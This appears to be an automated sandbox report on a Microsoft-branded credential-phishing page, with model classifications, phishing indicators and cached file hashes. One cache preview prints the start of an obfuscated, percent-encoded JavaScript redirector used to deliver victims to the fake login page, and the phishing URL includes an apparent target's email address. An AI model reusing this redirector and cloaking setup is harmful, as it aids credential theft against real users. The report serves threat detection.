URL: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org Model: jbxai	{ "brand":[], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"unknown", "text_input_field_labels":"unknown", "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "text":"Verifying... CLOUDFLARE Privacy Terms", "has_visible_qrcode":false}

URL: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Sign in", "text_input_field_labels":["Password"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "text":"Microsoft Enter password Your account or password is incorrect. If you can't re member your password, reset it now. Password Forgot my password", "has_visible_qrcode":false}

URL: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org Model: jbxai	{ "phishing_score":9, "brands":"Microsoft", "legit_domain":"microsoft.com", "classification":"wellknown", "reasons":["The brand 'Microsoft' is a well-known global technology company.", "The URL 'oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com' does not match the legitimate domain 'microsoft.com'.", "The URL contains multiple hyphens and unusual subdomains, which are common indicators of phishing.", "The domain 'linodeobjects.com' is associated with Linode, a cloud hosting provider, which could be used by anyone to host content, including potentially malicious actors.", "The presence of a password input field increases the risk, as phishing sites often attempt to capture sensitive information."], "brand_matches":[false], "url_match":false, "brand_input":"Microsoft", "input_fields":"Password"}

Created / dropped Files

Chrome Cache Entry: 67

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (20357)
Category:	downloaded
Size (bytes):	20792
Entropy (8bit):	3.2670392113290387
Encrypted:	false
SSDEEP:
MD5:	920D3CD2AF1D1341834B600233AECAE9
SHA1:	B85E0B16ED5C5B50C48032071BB709B6FCD35044
SHA-256:	BF1505F0E49A8A7DE5A7714E4A22EAA2CA6E76C394BE1902469290F352B5C399
SHA-512:	724D04170B9B084BA9A62AB7D50FE6C1E24DB5F33368B00F0247CBFD7C7D3A8BC8384B20315DA20C80D010D25A1A3145692587DD96008E7441F197EE83722BCD
Malicious:	false
Reputation:	unknown
URL:	https://risaleinurtz.com/wp-includes/tracking/
Preview:	<!DOCTYPE html>.<html>.<head>. <title>Loading...</title>. .. <script language="javascript">. var domainMatching = 'google';. var redirectUrl = 'https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6';. var redirectDelimiter = '#';. var enablebase64 = false;. var decodebase64 = false;.. document.write( unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%0A%0A%20%20%20%20%20%20%20%20%2F%2A%2A%0A%2A%0A%2A%20%20%42%61%73%65%36%34%20%65%6E%63%6F%64%65%20%2F%20%64%65%63%6F%64%65%0A%2A%0A%2A%2A%2F%0A%76%61%72%20%42%61%73%65%36%34%20%3D%20%7B%0A%0A%2F%2F%20%70%72%69%76%61%74%65%20%70%72%6F%70%65%72%74%79%0A%5F%6B%65%79%53%74%72%20%3A%20%22%41%42%43%44%45%46%47%48%49%4A%4B%4C%4D%4E%4F%50%51%52%53%54%55%56%57%58%59%5A%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%30%31%32%33%34%35%36%37%38%39%2B%2F%3D%22%2C%0A%0A%2F%2F%20%

Chrome Cache Entry: 68

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
URL:	https://code.jquery.com/jquery-3.6.0.min.js
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 71

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47459)
Category:	dropped
Size (bytes):	47460
Entropy (8bit):	5.397735966179774
Encrypted:	false
SSDEEP:
MD5:	5D332FD1AE9FEB79A10425DFC3F84FE4
SHA1:	C7D7F9D2BF5EE08E242765803CDD3A223FE1CBFC
SHA-256:	2EA786910282DF7AE154A0011375CD1254ADBD8EF0E75EB62177ADA67DAF9611
SHA-512:	01CDAC8103290B0FC1BF9BE8EE3923BFA6B8AD7778FF6B4716E421D6BBB3382240D9316B9994D6F4EA87E67DA9791EB8E3E2A1AAF81DBD749B3C8D7778E15F20
Malicious:	false
Reputation:	unknown
Preview:	"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(p){Wt(l,o,c,h,f,"next",p)}function f(p){Wt(l,o,c,h,f,"throw",p)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

Chrome Cache Entry: 72

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 59 x 70, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	4.035372245524405
Encrypted:	false
SSDEEP:
MD5:	46AB66A51FA99467379E3C950B629614
SHA1:	6D443C7DAE3E2770C60C602C21DC4EF7525D495A
SHA-256:	1BF7120C517DD0FE9E93069FBB0769E42D350432C6070E24F139AD8CD0ED8542
SHA-512:	E0D6CBA49F7D82B62328EADC4053DA45E06923E8E6EA86C43D6C86BF2894807A89CC644B9D495C8165F41B4E1389E55A5351502E2F3902E516A5F3520D649A9D
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8cf778ebdb954363/1728404575749/MzDh0e3o6BBqQTx
Preview:	.PNG........IHDR...;...F.......{.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 73

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 75

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47992), with no line terminators
Category:	dropped
Size (bytes):	47992
Entropy (8bit):	5.605846858683577
Encrypted:	false
SSDEEP:
MD5:	CF3402D7483B127DED4069D651EA4A22
SHA1:	BDE186152457CACF9C35477B5BDDA5BCB56B1F45
SHA-256:	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
SHA-512:	9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
Malicious:	false
Reputation:	unknown
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt\|\|function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create\|\|function(t){var e;return n.prototype=t,e=new n,n.prototype=null

Chrome Cache Entry: 77

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (515), with CRLF line terminators
Category:	dropped
Size (bytes):	6761
Entropy (8bit):	4.760890326647764
Encrypted:	false
SSDEEP:
MD5:	AF9195C999C0B1AAAD342EAB3661E5CA
SHA1:	D628D8388966C5923EB7A119F3E4FDF0B2E4143E
SHA-256:	D04378018E20435907FED149CF2CA2B42E839AEB7A9CE1A2424B8FD874876E77
SHA-512:	E87225230F8925B92E197317CBA599EEA98E4B9D649DCC892A15F35B528E8A10AA32C13EF4178D2FE5FDDAA22C0AD9E6FACBA0955455669DF5561D48C60318C4
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Roadster Car Enthusiasts - quantumazurao.com.de</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> ..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://quantumazurao.com.de/#">.. <i class="fas fa-car"></i> Roadster Car Enthusiasts .. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">.. <span class="navb

Chrome Cache Entry: 79

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	253
Entropy (8bit):	5.19189477487854
Encrypted:	false
SSDEEP:
MD5:	40F9DC6932BA8165701AB59C1D53E75F
SHA1:	8E98C9DBF1F36BD5219FDD09D377B6565134B44E
SHA-256:	705D2C16DA56A03DBE8C13C7DB616B9455532F4A6A91F2229C113EEA0E2A5EF4
SHA-512:	CF9660CB8506D97E4C9B3A6B9BA0A60DC0CA3FF4E9B00620531932BAA77BD086BBFCDBB364EA17F84FBF3C7B4EF36D3416F1CF0E254488F67D2F66325F3E5FCD
Malicious:	false
Reputation:	unknown
URL:	https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/favicon.ico
Preview:	<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><BucketName>oracle-edw-optim-analytics-platform</BucketName><RequestId>tx000009dea34447e7496d2-0067055c5f-7a2c13fe-default</RequestId><HostId>7a2c13fe-default-default</HostId></Error>

Chrome Cache Entry: 80

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (3330), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	6591
Entropy (8bit):	5.608153129639936
Encrypted:	false
SSDEEP:
MD5:	433CEB7AE6BD5779C6FF75A777433904
SHA1:	DAA1F1DBDE271131F6AAB181093DE84DB1A572D9
SHA-256:	86B5340741C023F6A2DD0B36BB9AFA30E9E9324C4913938CE2C4CB5824300808
SHA-512:	4E9ACB7977DAED17BA7A7A19217A443A55B4FF06FA5BAE5B22A45E8CDC5E4228C3AF69983A83B8756FDE976A87E38C838876252CCFE94B4D92C9A92E3E53ABC8
Malicious:	false
Reputation:	unknown
URL:	https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html
Preview:	<html>....<head>.... <meta name="viewport"..content="width=device-width,.initial-scale=1.0">... <meta..name="robots"..content="noindex, nofollow">..... <script. src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"> </script>.. .<script. src="https://challenges.cloudflare.com/turnstile/v0/api.js"> .</script>.... <style>.....body ,.html.{. height:.. 100%;margin:..0;display:. .flex;align-items:. center;justify-content:.center .}. @keyframes bounce { 0%.,. 100%.,.12.5% ,. 32.5%. ,..76.1% { transform: translateY(0).} .22.5% ,.86%. .{.. transform: .translateY(7px) }.} .#yellowish { height:.179px;width: .130px;overflow: hidden;margin-top: -59px;margin-left: .25px.}. .@keyframes.shadow-fade.{ 0%.., .100% ,. .21.2%...,.80% { opacity:.0.}..47%. ,.70%.. { .opacity:.1. } ..}. #backgammon { .width: 130px;margin-top:.. 179px.} #obelisk. {..width: .130px;height:. 71px;border-radius:. 0...0..7px 7px;overflow: hidden;margin-top: -41px.}.#obelisk..> .back

Static File Info

⊘No static file info